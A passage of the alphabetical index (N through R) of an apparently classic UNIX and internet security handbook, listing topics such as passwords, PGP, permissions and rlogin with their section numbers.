nosuid : 11.1.2. Back Doors and Trap Doors<br />

Novell : 1.3. History of <strong>UNIX</strong><br />

novrfy (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

Nowitz, David : 15.2. Versions of UUCP<br />

NOWRITE= command : 15.5.2. Permissions Commands<br />

npasswd package : 8.8.2. Constraining Passwords<br />

NPROC variable : 25.2.1.1. Too many processes<br />

NSA (National <strong>Sec</strong>urity Agency) : F.2.2. National <strong>Sec</strong>urity Agency (NSA)<br />

NSWS (NextStep Window Server) : 17.3.16. NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NTP (Network Time Protocol) : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

<strong>Sec</strong>ure RPC and : 19.3.1.3. Setting the window<br />

NU-CERT : F.3.4.28. Northwestern University<br />

null device : 5.6. Device Files<br />

nuucp account<br />

15.1.4. How the UUCP Commands Work<br />

15.3.1. Assigning Additional UUCP Logins<br />

15.4.1.3. Format of USERFILE entry without system name<br />

Index: O<br />

obscurity : (see security, through obscurity)<br />

octal file permissions<br />

5.2.3. Calculating Octal File Permissions<br />

5.2.4. Using Octal File Permissions<br />

octets : 16.2.1. <strong>Internet</strong> Addresses<br />

Odlyzko, Andrew : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

OFB (output feedback) : 6.4.4.2. DES modes<br />

on-the-job security<br />

13.2. On the Job<br />

13.2.6. Departure<br />

one : 9.2.1. Comparison Copies<br />

one-command accounts : 8.1.3. Accounts That Run a Single Command<br />

one-time pad encryption<br />

6.4.7. An Unbreakable Encryption Algorithm<br />

8.7.3. Code Books<br />

one-time passwords<br />

3.7. One-Time Passwords<br />

8.7. One-Time Passwords<br />

8.7.3. Code Books<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

23.3. Tips on Writing Network Programs<br />

one-way phone lines : 14.4.1. One-Way Phone Lines<br />

open access, tradition of : 1.4.1. Expectations<br />

open accounts<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

8.8.7. Algorithm and Library Changes<br />

open command : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

O_CREAT and O_EXCL flags : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Open Software Distribution (OSD) : Preface<br />

Open Software Foundation (OSF) : 1.3. History of <strong>UNIX</strong><br />

open system call : 5.1.7. File Permissions in Detail<br />

Open Systems Interconnection (OSI) : 16.4.4. OSI<br />

opendir library call : 5.4. Using Directory Permissions<br />

operating systems<br />

1.2. What Is an Operating System?<br />

12.3.3. Other Media<br />

Which <strong>UNIX</strong> System?<br />

(see also under specific name)<br />

keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

optic cables : (see cables, network)<br />

optical vampire taps : 12.3.1.5. Fiber optic cable<br />

Options command : 18.3.2. Commands Within the &lt;Limit&gt; Block<br />

Orange Book : 2.3.3. Adding Up the Numbers<br />

originate mode : 14.3.1. Originate and Answer<br />

originate testing : 14.5.3.1. Originate testing<br />

OSF (Open Software Foundation) : 1.3. History of <strong>UNIX</strong><br />

OSF/1 operating system : 1.3. History of <strong>UNIX</strong><br />

OSI (Open Systems Interconnection) : 16.4.4. OSI<br />

Outcome table (NIS+) : 19.5.3. NIS+ Tables<br />

outgoing calls : 14.5. Modems and <strong>UNIX</strong><br />

outgoing mail, logging : 10.4.2. Mail<br />

output feedback (OFB) : 6.4.4.2. DES modes<br />

outsiders : 13.3. Outsiders<br />

overload attacks<br />

25.2. Overload Attacks<br />

25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

overtime : 13.2.3. Performance Reviews and Monitoring<br />

overwriting media : 12.3.2.3. Sanitize your media before disposal<br />

OW- (sendmail.cf) : 17.3.4.2. Using sendmail to receive email<br />

owners of information : 2.4.4.1. Assign an owner<br />

owners, changing : 5.7. chown: Changing a File's Owner<br />

ownership notices : 26.2.6. Other Tips<br />

Index: P<br />

pacct file : 10.2. The acct/pacct Process Accounting File<br />

pack program : 6.6.1.2. Ways of improving the security of crypt<br />

packet sniffing : 16.3.1. Link-level <strong>Sec</strong>urity<br />

packet-switching networks : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

packets : (see IP packets)<br />

paper<br />

backups on : 24.5.1. Never Trust Anything Except Hardcopy<br />

copies : 7.3.2. Building an Automatic Backup System<br />

logging on : 10.7. Handwritten Logs<br />

shredders for : 12.3.3. Other Media<br />

throwing out : 12.3.3. Other Media<br />

parent processes : C.2. Creating Processes<br />

partitions : 25.2.2.4. Using partitions to protect your users<br />

backup by : 7.1.3. Types of Backups<br />

root : (see root directory)<br />

pass phrases : (see passwords)<br />

pass phrases for PGP<br />

6.6.3.1. Encrypting files with IDEA<br />

(see also passwords)<br />

passive FTP<br />

17.3.2.2. Passive vs. active FTP<br />

17.3.2.3. FTP passive mode<br />

passwd command<br />

3.4. Changing Your Password<br />

8.6.2. What Is Salt?<br />

as SUID program : 5.5. SUID<br />

-l option<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

-n option : 8.8.6. Password Aging and Expiration<br />

-x option : 8.8.6. Password Aging and Expiration<br />

-f nomemory option : 3.5. Verifying Your New Password<br />

using as superuser : 3.5. Verifying Your New Password<br />

passwd file<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

3.2.2. The /etc/passwd File and Network Databases<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

7.1.2. What Should You Back Up?<br />

8.1.1. Accounts Without Passwords<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

15.1.4. How the UUCP Commands Work<br />

24.4.1. New Accounts<br />

C.5.1. Process #1: /etc/init<br />

(see /etc/passwd file)<br />

Passwd table (NIS+) : 19.5.3. NIS+ Tables<br />

passwd+ package<br />

8.8.2. Constraining Passwords<br />

8.8.4. Password Generators<br />

password coach : 8.8.4. Password Generators<br />

password file : 19.4.4.6. NIS is confused about "+"<br />

password modems : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

password.adjunct file : 8.8.5. Shadow Password Files<br />

passwords<br />

3.2. Passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.8. Summary<br />

23.5. Tips on Using Passwords<br />

accounts without : 8.1.1. Accounts Without Passwords<br />

assigning to users : 8.8.1. Assigning Passwords to Users<br />

avoiding conventional<br />

8.8. Administrative Techniques for Conventional Passwords<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

bad choices for<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

changing<br />

3.4. Changing Your Password<br />

3.5. Verifying Your New Password<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

checklist for : A.1.1.2. Chapter 3: Users and Passwords<br />

constraining : 8.8.2. Constraining Passwords<br />

conventional : 3.2.6. Conventional <strong>UNIX</strong> Passwords<br />

cracking<br />

8.6.1. The crypt() Algorithm<br />

8.8.3. Cracking Your Own Passwords<br />

8.8.3.2. The dilemma of password crackers<br />

17.3.3. TELNET (TCP Port 23)<br />

encrypting<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.4. Crypt16() and Other Algorithms<br />

expiring : 8.8.6. Password Aging and Expiration<br />

federal jurisdiction over : 26.2.2. Federal Jurisdiction<br />

FTP and : 17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

generators of : 8.8.4. Password Generators<br />

hit lists of : 3.6.1. Bad Passwords: Open Doors<br />

Kerberos : 19.6.5. Kerberos Limitations<br />

logging changes to : 10.7.2.1. Exception and activity reports<br />

logging failed attempts at : 10.5.3. syslog Messages<br />

for MUDs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

on multiple machines<br />

3.6.4. Passwords on Multiple Machines<br />

3.6.5. Writing Down Passwords<br />

over network connections : 23.3. Tips on Writing Network Programs<br />

with network services : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

NIS, with <strong>Sec</strong>ure RPC : 19.3.2.1. Creating passwords for users<br />

NIS+, changing : 19.5.4.1. Changing your password<br />

one-time<br />

3.7. One-Time Passwords<br />

8.7. One-Time Passwords<br />

8.7.3. Code Books<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

with POP : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

required for Web use<br />

18.3.2. Commands Within the &lt;Limit&gt; Block<br />

18.3.3. Setting Up Web Users and Passwords<br />

shadow<br />

8.4.1. Changing an Account's Password<br />

8.8.5. Shadow Password Files<br />

sniffing<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3. Users and Passwords<br />

8.7. One-Time Passwords<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

token cards with : 8.7.2. Token Cards<br />

unique, number of : 3.6.3. Good Passwords: Locked Doors<br />

usernames as : 8.8.3.1. Joetest: a simple password cracker<br />

UUCP accounts : 15.3.2. Establishing UUCP Passwords<br />

verifying new : 3.5. Verifying Your New Password<br />

wizard's (sendmail) : 17.3.4.1. sendmail and security<br />

writing down : 3.6.5. Writing Down Passwords<br />

patches, logging : 10.7.2.2. Informational material<br />

patents : 26.4.4. Patent Concerns<br />

and cryptography : 6.7.1. Cryptography and the U.S. Patent System<br />

PATH variable<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

23.4. Tips on Writing SUID/SGID Programs<br />

attacks via : 11.5.1.1. PATH attacks<br />

pathnames : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

paths : 5.1.3. Current Directory and Paths<br />

trusted : 8.5.3.1. Trusted path<br />

pax program : 7.4.2. Simple Archives<br />

PCERT (Purdue University) : F.3.4.30. Purdue University<br />

PCs<br />

viruses on : 11.1.5. Viruses<br />

web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

PDP-11 processors<br />

1.3. History of <strong>UNIX</strong><br />

8.6.1. The crypt() Algorithm<br />

Penn State response team : F.3.4.29. Pennsylvania State University<br />

per-machine logs : 10.7.2. Per-Machine Logs<br />

per-site logs : 10.7.1. Per-Site Logs<br />

performance<br />

compromised<br />

25.2.1. Process-Overload Problems<br />

25.2.1.2. System overload attacks<br />

reviews : 13.2.3. Performance Reviews and Monitoring<br />

with <strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

using FFS : 25.2.2.6. Reserved space<br />

perimeter, security : 12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

perl command<br />

-T option<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

Perl programming language<br />

5.5.3. SUID Shell Scripts<br />

11.1.4. Trojan Horses<br />

11.5.1.2. IFS attacks<br />

random seed generator : 23.9. A Good Random Seed Generator<br />

script for reading lastlog file : 10.1.1. lastlog File<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

tainting facility : 18.2.3.4. Tainting with Perl<br />

permissions<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

5.1.6. Understanding File Permissions<br />

5.2.4. Using Octal File Permissions<br />

11.1.5. Viruses<br />

11.6.1. File Protections<br />

11.6.1.3. World-readable backup devices<br />

access control lists (ACLs)<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

changing<br />

5.2.1. chmod: Changing a File's Permissions<br />

5.2.4. Using Octal File Permissions<br />

directory : 5.4. Using Directory Permissions<br />

/etc/utmp file : 10.1.2. utmp and wtmp Files<br />

intruder's modifications to : 24.4.1.2. Changes in file and directory protections<br />

modem devices : 14.5.2. Setting Up the <strong>UNIX</strong> Device<br />

modem files : 14.5.1. Hooking Up a Modem to Your Computer<br />

of NIS+ objects : 19.5.5. NIS+ Limitations<br />

octal<br />

5.2.3. Calculating Octal File Permissions<br />

5.2.4. Using Octal File Permissions<br />

of .rhosts file : 17.3.18.4. The ~/.rhosts file<br />

SUID programs<br />

5.5. SUID<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

symbolic links and : 5.1.7. File Permissions in Detail<br />

umasks<br />

5.3. The umask<br />

5.3.2. Common umask Values<br />

UUCP : 15.4.1.4. Special permissions<br />

Permissions file<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.1. Permissions File<br />

15.5.3. uucheck: Checking Your Permissions File<br />

checking with uucheck : 15.5.3. uucheck: Checking Your Permissions File<br />

personnel : (see employees)<br />

PGP (Pretty Good Privacy)<br />

6.6.3. PGP: Pretty Good Privacy<br />

6.6.3.6. PGP detached signatures<br />

-eat and -seat options : 6.6.3.3. Encrypting a message<br />

encrypting message with : 6.6.3.3. Encrypting a message<br />

encrypting Web documents : 18.4.1. Eavesdropping Over the Wire<br />

-ka option : 6.6.3.2. Creating your PGP public key<br />

-kg option : 6.6.3.2. Creating your PGP public key<br />

-kvc option : 6.6.3.6. PGP detached signatures<br />

-kxaf option : 6.6.3.2. Creating your PGP public key<br />

-o option : 6.6.3.6. PGP detached signatures<br />

-sat option : 6.6.3.4. Adding a digital signature to an announcement<br />

-sb option : 6.6.3.6. PGP detached signatures<br />

software signature : E.4. Software Resources<br />

ph (phonebook) server : 17.3.8.3. Replacing finger<br />

phantom mail : 17.3.4.2. Using sendmail to receive email<br />

physical security<br />

12. Physical <strong>Sec</strong>urity<br />

12.4.2. "Nothing to Lose?"<br />

access control : 12.2.3. Physical Access<br />

of backups<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

checklist for : A.1.1.11. Chapter 12: Physical <strong>Sec</strong>urity<br />

modems<br />

14.5.4. Physical Protection of Modems<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

signal grounding : 25.3.3. Signal Grounding<br />

PIDs (process IDs)<br />

C.1.3.1. Process identification numbers (PID)<br />

C.1.3.4. Process groups and sessions<br />

Pieprzyk, Josef : 6.5.4.3. HAVAL<br />

PingWare program : 17.6.3. PingWare<br />

pipe (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

pipes<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

pipes (for smoking) : 12.2.1.2. Smoke<br />

piracy of software<br />

26.4.2.1. Software piracy and the SPA<br />

(see also software)<br />

pirated software : (see software)<br />

plaintext attacks : 6.2.3. Cryptographic Strength<br />

.plan file : 17.3.8.1. The .plan and .project files<br />

platforms : (see operating systems)<br />

play accounts : (see open accounts)<br />

playback attacks : 19.6.1.2. Using the ticket granting ticket<br />

plus sign (+)<br />

in hosts.equiv file : 17.3.18.5. Searching for .rhosts files<br />

in NIS<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.4.6. NIS is confused about "+"<br />

Point-to-Point Protocol (PPP) : 14.5. Modems and <strong>UNIX</strong><br />

policy, security<br />

1.2. What Is an Operating System?<br />

2. Policies and Guidelines<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

A.1.1.1. Chapter 2: Policies and Guidelines<br />

cost-benefit analysis<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

risk assessment<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

role of<br />

2.4.1. The Role of Policy<br />

2.4.4. Some Key Ideas in Developing a Workable Policy<br />

2.4.4.7. Defend in depth<br />

politics : 11.3. Authors<br />

polyalphabetic ciphers : 6.3. The Enigma Encryption System<br />

polygraph tests : 13.1. Background Checks<br />

POP (Post Office Protocol) : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

popen function<br />

18.2.3.2. Testing is not enough!<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

pornography : 26.4.5. Pornography and Indecent Material<br />

port numbers<br />

23.3. Tips on Writing Network Programs<br />

G. Table of IP Services<br />

portable computers : 12.2.6.3. Portables<br />

portable I/O library : 1.3. History of <strong>UNIX</strong><br />

portmap service<br />

19.2.1. Sun's portmap/rpcbind<br />

19.4.4.4. Spoofing RPC<br />

E.4.6. portmap<br />

portmapper program<br />

17.3.11. Sun RPC's portmapper (UDP and TCP Ports 111)<br />

ports<br />

19.2.1. Sun's portmap/rpcbind<br />

19.4.5. Unintended Disclosure of Site Information with NIS<br />

16.2.4.2. TCP<br />

17.1.1. The /etc/services File<br />

G. Table of IP Services<br />

trusted : (see trusted, ports)<br />

positivity : 2.4.4.2. Be positive<br />

POSIX<br />

1.3. History of <strong>UNIX</strong><br />

1.4.2. Software Quality<br />

C.1.3.4. Process groups and sessions<br />

chown command and : 5.7. chown: Changing a File's Owner<br />

Post Office Protocol : (see POP)<br />

postmaster, contacting : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

PostScript files : 11.1.5. Viruses<br />

power outages, logging : 10.7.1.1. Exception and activity reports<br />

power surges<br />

12.2. Protecting Computer Hardware<br />

12.2.1.8. Electrical noise<br />

(see also lightning)<br />

PPP (Point-to-Point Protocol)<br />

14.5. Modems and <strong>UNIX</strong><br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

preserve program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

Pretty Good Privacy : (see PGP)<br />

prevention, cost of<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

primary group : 4.1.3. Groups and Group Identifiers (GIDs)<br />

principals, NIS+ : 19.5.1. What NIS+ Does<br />

print through process : 12.3.2.1. Verify your backups<br />

printers<br />

buffers : 12.3.4.1. Printer buffers<br />

/etc/hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

logging to : 10.5.2.1. Logging to a printer<br />

output from : 12.3.4.2. Printer output<br />

ports for : 12.3.1.4. Auxiliary ports on terminals<br />

priority of processes : C.1.3.3. Process priority and niceness<br />

privacy<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

2.5.2. Confidential Information<br />

9. Integrity Management<br />

12.3. Protecting Data<br />

12.3.6. Key Switches<br />

(see also encryption; integrity)<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

<strong>Sec</strong>ure RPC : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

private-key cryptography<br />

6.4. Common Cryptographic Algorithms<br />

6.4.1. Summary of Private Key Systems<br />

privilege testing (modem) : 14.5.3.3. Privilege testing<br />

privileges, file : (see permissions)<br />

privileges, SUID : (see SUID/SGID programs)<br />

processes<br />

C.1. About Processes<br />

C.5.3. Running the User's Shell<br />

accounting<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

group IDs<br />

4.3.3. Other IDs<br />

C.1.3.4. Process groups and sessions<br />

overload attacks<br />

25.2.1. Process-Overload Problems<br />

25.2.1.2. System overload attacks<br />

priority of : C.1.3.3. Process priority and niceness<br />

scheduler : C.1.3.3. Process priority and niceness<br />

procmail system : 11.5.2.5. .forward, .procmailrc<br />

.procmailrc file : 11.5.2.5. .forward, .procmailrc<br />

.profile file<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

programmed threats<br />

11. Protecting Against Programmed Threats<br />

11.6.2. Shared Libraries<br />

authors of : 11.3. Authors<br />

checklist for : A.1.1.10. Chapter 11: Protecting Against Programmed Threats<br />

protection from : 11.5. Protecting Yourself<br />

references on : D.1.4. Computer Viruses and Programmed Threats<br />

programming : 23. Writing <strong>Sec</strong>ure SUID and Network Programs<br />

references for : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

programs<br />

CGI : (see CGI, scripts)<br />

integrity of : (see integrity, data)<br />

for network services : 23.3. Tips on Writing Network Programs<br />

rabbit<br />

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

running simultaneously : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

secure : 23. Writing <strong>Sec</strong>ure SUID and Network Programs<br />

worms : 11.1.6. Worms<br />

Project Athena : (see Kerberos system)<br />

.project file : 17.3.8.1. The .plan and .project files<br />

proprietary ownership notices : 26.2.6. Other Tips<br />

prosecution, criminal<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

protocols<br />

16.2.4. Packets and Protocols<br />

(see also under specific protocol)<br />

IP : (see IP protocols)<br />

Protocols table (NIS+) : 19.5.3. NIS+ Tables<br />

proxies, checklist for : A.1.1.21. Chapter 22: Wrappers and Proxies<br />

pruning the wtmp file : 10.1.3.1. Pruning the wtmp file<br />

ps command<br />

6.6.2. des: The Data Encryption Standard<br />

10.1.2. utmp and wtmp Files<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

24.2.1. Catching One in the Act<br />

C.1.2. The ps Command<br />

C.1.2.2. Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

with kill command : 24.2.5. Getting Rid of the Intruder<br />

to stop process overload<br />

25.2.1.1. Too many processes<br />

25.2.1.2. System overload attacks<br />

pseudo-devices : 5.6. Device Files<br />

pseudorandom functions : 23.6. Tips on Generating Random Numbers<br />

PUBDIR= command : 15.5.2. Permissions Commands<br />

public-key cryptography<br />

6.4. Common Cryptographic Algorithms<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

18.3. Controlling Access to Files on Your Server<br />

18.6. Dependence on Third Parties<br />

breaking : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

PGP : 6.6.3.2. Creating your PGP public key<br />

proving identity with : 19.3.1.1. Proving your identity<br />

publicity hounds : 11.3. Authors<br />

publicizing security holes : 2.5.1. Going Public<br />

publickey file : 19.3.2.1. Creating passwords for users<br />

Purdue University (PCERT) : F.3.4.30. Purdue University<br />

Purify : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

pwck command : 8.2. Monitoring File Format<br />

Index: Q<br />

quality of software<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

quantifying threats : 2.2.1.3. Quantifying the threats<br />

quot command : 25.2.2.2. quot command<br />

quotacheck -a command : 25.2.2.5. Using quotas<br />

quotas : 25.2.2.5. Using quotas<br />

on /tmp directory : 25.2.4. /tmp Problems<br />

Index: R<br />

rabbit programs<br />

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

race conditions : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

radio<br />

eavesdropping : 12.3.1.3. Eavesdropping by radio and using TEMPEST<br />

transmissions : 14.4.4.1. Kinds of eavesdropping<br />

transmitters : 12.2.1.8. Electrical noise<br />

rain : (see water)<br />

RAM theft : 12.2.6. Preventing Theft<br />

rand function : 23.7.1. rand ( )<br />

random device : 23.7.4. Other random number generators<br />

random function : 23.7.2. random ( )<br />

random numbers : 23.6. Tips on Generating Random Numbers<br />

raw devices : 5.6. Device Files<br />

rc directory : C.5.1. Process #1: /etc/init<br />

RC2, RC4, and RC5 algorithms<br />

6.4.1. Summary of Private Key Systems<br />

6.4.8. Proprietary Encryption Systems<br />

RC4 and RC5 algorithms : 6.4.1. Summary of Private Key Systems<br />

rcp command<br />

1.4.3. Add-On Functionality Breeds Problems<br />

7.4.5. Backups Across the Net<br />

RCS (Revision Control System)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

rdist program<br />

7.4.5. Backups Across the Net<br />

9.2.1.3. rdist<br />

rdump/rrestore program : 7.4.5. Backups Across the Net<br />

read permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

read system call : 5.1.7. File Permissions in Detail<br />

time-outs on : 23.3. Tips on Writing Network Programs<br />

read-only exporting filesystems : 11.6.1.2. Writable system files and directories<br />

read-only filesystems : 9.1.2. Read-only Filesystems<br />

READ= command : 15.5.2. Permissions Commands<br />

readdir library call : 5.4. Using Directory Permissions<br />

real UIDs/GIDs<br />

4.3.1. Real and Effective UIDs<br />

C.1.3.2. Process real and effective UID<br />

realpath function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

reauthentication<br />

Kerberos : 19.6.4. Using Kerberos<br />

<strong>Sec</strong>ure RPC : 19.3.1.3. Setting the window<br />

Receive Data (RD) : 14.3. The RS-232 Serial Protocol<br />

Redman, Brian E. : 15.2. Versions of UUCP<br />

refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

reflectors (in Enigma system) : 6.3. The Enigma Encryption System<br />

reformatting attack : 25.1. Destructive Attacks<br />

relative humidity : 12.2.1.11. Humidity<br />

relative pathnames : 5.1.3. Current Directory and Paths<br />

remote<br />

command execution<br />

15.1.2. uux Command<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.17. rexec (TCP Port 512)<br />

comparison copies : 9.2.1.2. Remote copies<br />

computers<br />

transferring files to : 15.1.1. uucp Command<br />

file access (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

network filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

procedure calls : (see RPCs)<br />

remote file<br />

10.3.1. aculog File<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

remote.unknown file : 15.5. <strong>Sec</strong>urity in BNU UUCP<br />

renice command<br />

25.2.1.2. System overload attacks<br />

C.1.3.3. Process priority and niceness<br />

replay attacks<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

19.6.1.2. Using the ticket granting ticket<br />

reporting security holes : 2.5.1. Going Public<br />

Request to Send (RTS) : 14.3. The RS-232 Serial Protocol<br />

REQUEST= command<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

reserved memory space : 25.2.2.6. Reserved space<br />

resolution, time : 23.8. Picking a Random Seed<br />

resolver library (bind) : 16.2.6.1. DNS under <strong>UNIX</strong><br />

resolving (DNS) : 17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

response teams<br />

27.3.5. Response Personnel?<br />

F.3. Emergency Response Organizations<br />

F.3.4.46. Westinghouse Electric Corporation<br />

mailing lists for : E.1.1. Response Teams and Vendors<br />

restore : (see dump/restore program)<br />

restricted<br />

filesystems<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

FTP : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

logins : 8.3. Restricting Logins<br />

shells<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

su use : 4.3.6. Restricting su<br />

restrictmailq (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

retention of backups<br />

7.1.5. How Long Should You Keep a Backup?<br />

7.2.2.2. Retention schedule<br />

(see also networks, backing up)<br />

return calls : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

reverse lookup<br />

16.3.2. <strong>Sec</strong>urity and Nameservice<br />

23.3. Tips on Writing Network Programs<br />

Revision Control System (RCS)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

revocation certificate : 6.6.3.2. Creating your PGP public key<br />

rexd service : 19.2.2.4. AUTH_KERB<br />

rexec service : 17.3.17. rexec (TCP Port 512)<br />

RFC 1750 : 23.8. Picking a Random Seed<br />

.rhosts file<br />

10.4.3. Network Setup<br />

17.3.18.4. The ~/.rhosts file<br />

17.3.18.5. Searching for .rhosts files<br />

back door in : 11.1.2. Back Doors and Trap Doors<br />

intruder's changes to : 24.4.1.4. Changes in .rhosts files<br />

searching for : 17.3.18.5. Searching for .rhosts files<br />

Ring Indicator (RI) : 14.3. The RS-232 Serial Protocol<br />

RIP (Routing <strong>Internet</strong> Protocol) : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

risk assessment<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

risks : (see threats)<br />

Ritchie, Dennis : 1.3. History of <strong>UNIX</strong><br />

Rivest, Ronald L.<br />

6.1.3. Modern Controversy<br />

6.4.1. Summary of Private Key Systems<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.5.4.1. MD2, MD4, and MD5<br />

RJE (Remote Job Entry) : 3.2.1. The /etc/passwd File<br />

rlogin command<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3.5. Verifying Your New Password<br />

16.3.2. <strong>Sec</strong>urity and Nameservice<br />

17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

17.3.18.6. /etc/hosts.lpd file<br />

versus Telnet : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

rlogind command : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

rm command<br />

5.4. Using Directory Permissions<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

and deep tree structures : 25.2.2.8. Tree-structure attacks<br />

rmail program : 15.4.3. L.cmds: Providing Remote Command Execution<br />

root account<br />

4. Users, Groups, and the Superuser<br />

4.1. Users and Groups<br />

4.2.1. The Superuser<br />

4.2.1.5. The problem with the superuser<br />

5.5.2. Problems with SUID<br />

(see also superuser)<br />

abilities of : 27.1.3. What the Superuser Can and Cannot Do<br />

chroot<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

